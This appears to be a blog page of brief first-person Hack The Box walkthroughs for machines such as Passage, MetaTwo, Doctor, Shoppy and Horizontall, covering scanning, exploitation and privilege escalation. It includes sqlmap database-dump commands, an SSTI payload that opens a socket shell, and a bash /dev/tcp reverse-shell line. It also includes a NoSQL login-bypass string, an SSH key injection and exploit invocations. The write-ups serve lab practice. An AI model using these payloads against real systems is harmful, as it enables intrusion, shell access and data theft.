Etiket: Walkthrough
Walkthrough
Passage HTB Writeup
I scan ports with nmap.
I look the website that is made by CuteNews and I find a exploit to get shell.
https://www.exploit-db.com/exploits/48800After download the exploit. I run the exploit and I get the shell but reverse shell is more confortable so I get the reverse shell.
I find a some information that is encoded with base64 under the users directory. And I open with the cat command.
cat *.phpI decode the encoded string and crack the hash.
YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19
password:e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
I change to paul user.
I search vulnerabilities. Although It takes a lot but I don’t find any information about vulnerability so I look the authorized_key about paul and key is the same nadav. I change Nadav via ssh.
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzXiscFGV3l9T2gvXOkh9w+BpPnhFv5AOPagArgzWDk9uUq7/4v4kuzso/lAvQIg2gYaEHlDdpqd9gCYA7tg76N5RLbroGqA6Po91Q69PQadLsziJnYumbhClgPLGuBj06YKDktI3bo/H3jxYTXY3kfIUKo3WFnoVZiTmvKLDkAlO/+S2tYQa7wMleSR01pP4VExxPW4xDfbLnnp9zOUVBpdCMHl8lRdgogOQuEadRNRwCdIkmMEY5efV3YsYcwBwc6h/ZB4u8xPyH3yFlBNR7JADkn7ZFnrdvTh3OY+kLEr6FuiSyOEWhcPybkM5hxdL9ge9bWreSfNC1122qq49d nadav@passage
After the ssh login with paul. I run the linpeas and linpeas find a usbcreator vulnerability. When I abuse the vulnerability, It was not working I try in the nadav user.
https://www.exploit-db.com/exploits/36820
MetaTwo HTB Writeup
I scan with nmap tool.
I add the domain and his ip address into /etc/hosts.
I scan with gobuseter either dns and directory.
I find a vulnerable version of the BookingPress under the http://metapress.htb/events/
I make the same instruction that above image. I have to find nonce and find it so I run the exploit and I get the response.
It may be a sqlinjection and I try it.
sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --method POST --data "action=bookingpress_front_get_category_services&_wpnonce=ad14d8652b&category_id=123&total_service=111" -p total_service --level=5 --risk=3 --dbs Yess there is a sql vulnerability.
sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --method POST --data "action=bookingpress_front_get_category_services&_wpnonce=ad14d8652b&category_id=123&total_service=111" -p total_service --level=5 --risk=3 -D blog --tables
sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --method POST --data "action=bookingpress_front_get_category_services&_wpnonce=ad14d8652b&category_id=123&total_service=111" -p total_service --level=5 --risk=3 -D blog -T wp_
users --dump sqlmap say that where is the result of scaning.
I crack manager of hash with john the ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txtI login in the website.
WordPress 5.6.2 has a XXE vulnerability.
https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/
I do the instructions that I show the link.
I upload the vaw file and I get the response.
I decode from base64.
I change the directory. I have look WordPress structure.
I modify my exploit like above the image.
I find ftp credentials. There is a intresting file that I have to look so I download the php file an find a credential.
I connect to ssh. There is a secret file unde the jnelson’s home directory file.
I try to crack PGP Private key and It success.
I execute the command and I am a root.
Previse HTB Writeup
I scan target machine with nmap tool.
I search directory to find endpoints.
I want to look these endpoints and website redirects. I have to find a vulnerability and I open the burpsuite and intercept the connection.
I click right button and click the do intercept because I want to see and modify redirect response.
website redirect this page when I modify http response header. I register it.
I login the website.
I download the backcp file and unzip. I make a static analysis in the files.
I find a these informations that can be benefical after to use that.
I find a command execution again 🙂 and I try it with burp suite.
I write a reverse shell and get a reverse shell. In the shell I use the credential which I find a file that I download from website to connect mysql database .
I try to crack with hashcat.
I connect the target machine via ssh.
Firstly, I execute ‘sudo -l’ command and I open the access_backup.sh to examine.
Is it possible path vulnerability. I try.
I create a gzip file under the tmp file and I add the tmp file to $PATH variable. When I execute a access_backup.sh. Firstly, bash file search the gzip file at the same directory path.
It works I am a root.
Sense HTB Writeup
I scan port with nmap tool.
I scan two ports with gobuster. One of them is working that is website which run at 443 port. Scanning take a long time a bit :). I find a interesting file.
When I look the file. There is a credentials.
I find the pfsense at the internet and there may be 2 passwords that it can be.
username: rohit password: pfsense
There isn’t any beneficial information that I can abuse it.
I execute exploit. It works and I am a root as unexpected. 😀
Doctor HTB Writeup
I scan the target machine with nmap tool.
There are two web services.
there is a intresting file at website that is at 80 port. I find a domain name. Name is doctors.htb. I search directory list with gobuster.
I register at the website and login.
I try to ssti for new post but it doesn’t look success.When I see the archive endpoint, it success :).
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
I find a payload to get a shell.
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#exploit-the-ssti-by-calling-popen-without-guessing-the-offset{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
After I get a shell, I execute id command in the shell.
What is adm? I search on the internet.
I search the clue under log files. Perfect !!! I find a password for shaun.
I change a user.
On 8089 port is splunkd. I find a vulnerability about this. and there is a vulnerability that provide privesc.
Credential is required. And I have a credentials but I don’t know whatever execute or not. Yes I try credetentials for authentication. Credential is correct.
I execute payload. Finally I can read a root.txt 🙂
Cronos HTB Writeup
It ıs unstable machine that I have ever seen in the HTB. It is very hard for me and takes over 5 hours.
Nmap scan result.
I scan with gobuster for DNS searching. Gobuster finds a subdomain.
I try sql Injection attack at the website. It success
I try to execute command injection attack.
I upload a php-reverse-shell.php with wget.
I write http://admin.cronos.htb/php-reverse-shell.php at the web browser. Finally I get the shell.
I execute linpeas and linpeas show the vulnerability that cause privesc.
I upload php-reverse-shell that is changed listen port. and change with artisan.
Postman HTB Writeup
I scan to the target machine with nmap.
I search about redis. What is this? I find benefical information about redis in the hacktricks.
https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis
I try to do like this.
Firstly I create id_rsa and I cpoy the id_rsa.pub to spaced_key.txt. After I do above the instructions I send key to redis database.
So I connect to target machine via ssh.
I execute linpeas.
I find intresting file. It includes a certificate and try to crack password.
I try to connect these credentials but it does not successs.
I change user in the redis.
There is a vulnerability webmin 1.910. Before find credentials I find the exploit but I don’t have any credentials.
Shoppy HTB Writeup
I scan the target ip with nmap tool.
There are two open ports. I run gobuster tool to find directory.
found directory is not working. I decide to fuzzing for subdomain.
wfuzz -u http://10.10.11.180 -H "Host: FUZZ.shoppy.htb" -w /usr/share/wordlists/Seclists-2023.2/Discovery/DNS/bitquark-subdomain-top1000000.txt 
I do some changing for my command becaues output show every results.
wfuzz -u http://10.10.11.180 -H "Host: FUZZ.shoppy.htb" -w /usr/share/wordlists/Seclists-2023.2/Discovery/DNS/bitquark-subdomain-top1000000.txt -hh 169
I find one subdomain
mattermost
Oppss. I have to find a credential to login or I have to find another way.
I back to Shoppy login page and I try to sql Injection after read a blog that it is the below.
https://nullsweep.com/a-nosql-injection-primer-with-mongo/
admin'||'a'=='aI login 🙂
I click the Search fo users.
I enter the same payload that when I login.
I try to crack hashes and one of them is found.
The hash belongs josh. I login subdomain.
I find credentials to connect the target machine via ssh.
I connect ssh and I find intresting file that it is executable file. When I open the file with cat command password is plaintext.
SampleAccess
I change the user and I execute linpeas.
As I understand that I am in the docker and I find a privesc at GFTObin.
Horizontall HTB Writeup
I scan the port with nmap tool
I open the website and I find a valuable information that I can use. After a while I found a subdomain in the js file.
app.c68eb462.js
http://api-prod.horizontall.htb
I scan endpoints with gobuster at the subdomain. I found three endpoints.
gobuster dir -u http://api-prod.horizontall.htb/review
/admin
/usersThere is a panel that users can be login at subdomain.
I search the strapi at the searchsploit and there is a exploit that it can be used. I download the exploit and It works to get a shell.
searchsploit strapi
searchsploit -m multiple/webapps/50239.py
python3 50239.py http://api-prod.horizontall.htbmy payload to get shell: bash -c 'sh -i >& /dev/tcp/10.10.14.15/8081 0>&1'
I listen to communications and In the local there is a connection between localhost:8000 to any.
netstat -tlnp
I use the curl command to see webpage. While I examine the curl’s result, I find a information about website version.
curl 127.0.0.1:8000
Yes!!! Version is vulnerable and I find a exploit to abuse the vulnerability but I have a some connection issues. I decide to port forwarding so I create a id_rsa.pub
ssh-keygenI copy the key to add strapi .ssh. Before do this. I create .ssh directory at the target machine.
mkdir .ssh at strapiecho "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDSB0jPiiFzN3dick/HS7UacZ4CDLjJfMH8bRQFXk44uXFz6MLYWT5GPweWTCXDFhHSOj8j/7H/ciOskFNj3SaWCC0sBAeOf2rrsK/s7PfE9KxY8zan2jvfMuXNYljGUzRjuun1t3qumSh3jsGgAjesG62gSS9muqtGm3+z/MVd5nvdhLCreZAqG96n+V4VP4shlmmoQPuHQRkt1inQY09iUO3l3oEY8CWbFxTIFXYfXxBksuxlR6klkgjpiy9GNgTAFWplozWw8kKOEzwjf6bcolP8B+3/84C/7UoxFrFXI+J1uE5rrs/WisWrEPgeTGiLTKPI/kNYD/itvYiSsZvKFcbYonH7jcc0FBjBZB4X1tluFTPkOsD7rMlOUyxykGV6B+2wZgK6fAtt9ks1I2XJg0gKS7YAZcA7WXvicLuDEeTEjLj0T9uB6cKMZ0wjX8LkWV1Jsm4fEA2q0ZPGREsoq+R60K31uZe64+U0AucxBIfoSgfGT5FeeJQtFVyOdY0= mustafa@kali
> " > /opt/strapi/.ssh/authorized_keys
ssh -i ~/.ssh/id_rsa L 8000:127.0.0.1:8000 strapi@10.10.11.105
Port forwarding is OK. And I can run the exploit in my local.
https://github.com/nth347/CVE-2021-3129_exploit
chmod +x exploit.py
./exploit.py http://localhost:8000 Monolog/RCE1 'cat /root/root.txt'